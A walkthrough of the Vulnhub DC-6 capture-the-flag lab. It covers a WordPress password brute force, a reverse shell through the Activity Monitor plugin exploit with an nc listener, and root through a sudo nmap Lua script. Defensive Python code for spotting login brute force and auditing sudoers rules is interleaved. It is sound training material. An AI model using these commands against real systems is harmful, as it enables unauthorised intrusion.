Vulnhub DC6 Walkthrough

First, we add the hostname to the /etc/hosts file, as instructed on the site.

After running netdiscover to find the host IP, we run nmap to scan the host for open ports:

nmap -A -T4 -p- -vv <target IP>

Ports 22 and 80 are open, so we enter the IP in the browser and see the webpage.

We are redirected to http://wordy. I use Wappalyzer, which shows that the page is running WordPress 5.1.1.

Let's also run Nikto against the host IP.

The site is running WordPress and there is a login page.

The name Jens Dagmeister (it appears on the webpage) could be useful.

To cover all the bases, let's also run dirb.

As noted, the page is running WordPress, so scanning it with WPScan is the next step:

We get five usernames: admin, graham, mark, sarah and jens.

Now we can brute force these five usernames with rockyou.txt.

“OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

That should save you a few years.”

This advice from the lab's creator reduces the rockyou wordlist from millions of entries to only 2668 passwords.

Put all the usernames in a file, save it, and run the following command:

wpscan --url http://wordy/ -P /root/passwords.txt -U /root/names.txt

A hit comes back for one of the users along with the password.

And we are inside the WordPress dashboard.
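The credential brute force above is loud: every guess is a POST to wp-login.php. From the defender's side, the same activity shows up as a burst of such POSTs from one client, with the failed attempts answered by 200 (the login form again) and a successful one by a 302 redirect into wp-admin. The following detector is an added example, not code from the original post or from WPScan; the Apache combined-format log lines are constructed for the demonstration, and the threshold and window are assumptions to tune for your site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache combined-log fields we need: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": m.group("path").split("?")[0], "status": int(m.group("status"))}

def detect_wp_bruteforce(log_text, threshold=10, window_seconds=60):
    """Flag client IPs that POST to /wp-login.php at least `threshold` times
    inside any `window_seconds` sliding window. A 302 on one of those POSTs
    means WordPress accepted the credentials, so the IP is marked `succeeded`."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    events.sort(key=lambda e: e["ts"])
    window = defaultdict(deque)      # per-IP timestamps inside the current window
    stats = defaultdict(lambda: {"attempts": 0, "peak_in_window": 0, "succeeded": False})
    for e in events:
        if e["method"] != "POST" or e["path"] != "/wp-login.php":
            continue
        q = window[e["ip"]]
        q.append(e["ts"])
        while (e["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        s = stats[e["ip"]]
        s["attempts"] += 1
        s["peak_in_window"] = max(s["peak_in_window"], len(q))
        if e["status"] == 302:
            s["succeeded"] = True
    return {ip: s for ip, s in stats.items() if s["peak_in_window"] >= threshold}

# Constructed sample log (not from the lab): one scanner hammering the login
# form and succeeding on its 12th guess, plus one ordinary user logging in.
def _line(ip, sec, method, path, status, ua):
    return (f'{ip} - - [10/Oct/2023:12:00:{sec:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 2048 "-" "{ua}"')

SAMPLE_LOG = "\n".join(
    [_line("192.168.1.20", 0, "GET", "/", 200, "Mozilla/5.0"),
     _line("10.0.0.5", 0, "GET", "/wp-login.php", 200, "WPScan v3")]
    + [_line("10.0.0.5", s, "POST", "/wp-login.php", 200, "WPScan v3") for s in range(1, 12)]
    + [_line("10.0.0.5", 12, "POST", "/wp-login.php", 302, "WPScan v3"),
       _line("192.168.1.20", 5, "POST", "/wp-login.php", 302, "Mozilla/5.0")]
)

if __name__ == "__main__":
    for ip, s in detect_wp_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {s['attempts']} login POSTs, peak {s['peak_in_window']} "
              f"in window, succeeded={s['succeeded']}")
```

The ordinary user makes a single POST and is never flagged; the scanner trips the threshold and, because its last POST got a 302, is reported as a successful compromise rather than just noise. Feeding the real access log through the same function (and lowering the threshold for sites that rate-limit or lock accounts) turns the write-up's attack into an alert.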

Searching with searchsploit for WordPress returns a few exploits; one of them targets the Activity Monitor plugin, which is installed on this site.

Copy the exploit file 45274.html and edit the IP, port and address.

Start a listener with nc -lvp 999 on your machine, then open the HTML file in your browser. A page with a button (Submit Request) appears; pressing the button gives you a low-privilege shell.

cd to /home; in mark's directory I found a file named thing-to-do.txt, and viewing it gave me another username and password.

ssh graham@ with the provided password gave me a login to the account.

As graham, running sudo -l and viewing the listed files shows there is a bash script to run.

Running sudo -l shows that user jens can run /usr/bin/nmap without a password, so to escalate privileges via nmap we run the following commands:

echo "os.execute('/bin/sh')" > /tmp/shell.nse

sudo nmap --script=/tmp/shell.nse
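The root of this escalation is a sudoers entry that lets a user run nmap as root without a password; nmap's --script option runs Lua, so the rule is effectively "run anything as root". The same mistake is common with interpreters and with scripts the user can edit. The auditor below is an added example, not part of the original post or of the sudo project: it parses sudoers-style rules, flags NOPASSWD or unrestricted entries for binaries that execute arbitrary code, and flags script entries for a manual ownership check. The sudoers text is constructed for the demonstration (the usernames are borrowed from the box, the rules are not the lab's real configuration), and the set of flagged binaries is an assumption to extend for your environment.

```python
import re
import shlex
from os.path import basename

# Binaries that execute arbitrary code when run via sudo. nmap is the case from
# this write-up (--script runs Lua); the rest are plain interpreters.
# Assumed starting set; extend it for your environment.
SHELL_ESCAPE_BINARIES = {"nmap", "sh", "bash", "dash", "python", "python3", "perl"}

# user  host=(runas) [TAG: ...] command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$"
)

def parse_sudoers(text):
    """Expand sudoers rules into one record per (user, runas, command)."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            rules.append({"user": m.group("user"),
                          "runas": m.group("runas") or "root",
                          "nopasswd": "NOPASSWD" in tags,
                          "command": cmd.strip()})
    return rules

def audit_sudoers(text):
    """Return findings for rules that let a non-root user run arbitrary code."""
    findings = []
    for r in parse_sudoers(text):
        cmd = r["command"]
        exe = "ALL" if cmd == "ALL" else basename(shlex.split(cmd)[0])
        if cmd == "ALL" and r["user"] != "root":
            reason = "unrestricted command set; confirm who holds this right"
        elif exe in SHELL_ESCAPE_BINARIES:
            reason = f"{exe} can execute arbitrary code as {r['runas']}"
        elif exe.endswith(".sh"):
            reason = "script: verify it is root-owned and not writable by the user"
        else:
            continue                                   # narrowly scoped command, fine
        severity = "high" if (r["nopasswd"] or cmd == "ALL") else "medium"
        findings.append({**r, "severity": severity, "reason": reason})
    return findings

# Constructed sample, not the lab's real /etc/sudoers.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
graham  ALL=(jens) NOPASSWD: /opt/scripts/backup.sh
jens    ALL=(ALL) NOPASSWD: /usr/bin/nmap        # the DC-6 style mistake
sarah   ALL=(root) /usr/bin/python3
mark    ALL=(root) NOPASSWD: /usr/bin/systemctl status apache2
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f['severity']}] {f['user']} -> ({f['runas']}) {f['command']}: {f['reason']}")
```

Run against the real file with `sudo cat /etc/sudoers /etc/sudoers.d/* | python3 audit.py` piped into `audit_sudoers`, or against the output each user sees from sudo -l. The mark entry is left alone because it is pinned to one harmless argument list; the jens entry is the one that hands over root in this walkthrough, and the fix is to remove it or to restrict nmap to a wrapper script that does not accept --script.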

cat theflag.txt and we are done!
